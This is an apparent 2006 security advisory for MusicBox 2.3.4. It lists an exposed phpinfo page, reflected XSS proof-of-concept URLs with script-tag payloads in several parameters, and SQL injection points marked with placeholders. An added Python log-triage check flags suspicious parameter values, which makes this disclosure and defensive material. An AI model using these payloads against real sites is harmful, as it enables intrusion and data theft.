MusicBox <= 2.3.4 XSS SQL injection Vulnerability Jul 24 2006 04:00PM
securityconnection gmail com
MusicBox 2.3.4

http://www.musicboxv2.com

------------

PHPinfo page

------------

/phpinfo.php

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0

http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0

http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0

http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>

http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists

-------------

SQL injection

-------------

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]

http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists

http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------

Ellipsis Security

http://www.ellsec.org
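
An added example, not part of the original advisory and not MusicBox code: a log-triage check that flags requests where the parameters named above carry unexpected input. It assumes `show`, `start`, `page` and `aid` are non-negative integers (or empty) in normal use; the function name and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these parameters hold non-negative integers (or are empty) in normal use.
NUMERIC_PARAMS = {"show", "start", "page", "aid"}
# Parameters the advisory lists as reflected into the response.
REFLECTED_PARAMS = {"id", "term", "type", "show"}

DIGITS = re.compile(r"[0-9]+")
MARKUP = re.compile(r"[<>]")


def check_request(url):
    """Return a sorted list of (parameter, reason) findings for one request URL."""
    findings = set()
    query = urlsplit(url).query
    # parse_qs percent-decodes values, so encoded input is checked in decoded form.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in NUMERIC_PARAMS and value and not DIGITS.fullmatch(value):
                findings.add((name, "non-numeric"))
            if name in REFLECTED_PARAMS and MARKUP.search(value):
                findings.add((name, "markup"))
    return sorted(findings)


# Constructed sample request lines (not taken from any real log).
SAMPLE_REQUESTS = [
    "/index.php?term=hit&in=song&action=search&start=0",
    "/index.php?action=top&show=5&type=Artists",
    "/index.php?action=top&show=1%27x&type=Artists",
    "/index.php?term=%3Cb%3Ex%3C%2Fb%3E&in=song&action=search&start=0",
    "/?action=viewgallery&type=album&aid=&page=-1",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request, check_request(request))
```

The same two rules (integer-only for the numeric parameters, HTML-encoding for reflected ones) are what the application itself needs to enforce server-side; the log check only shows where they are being violated.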
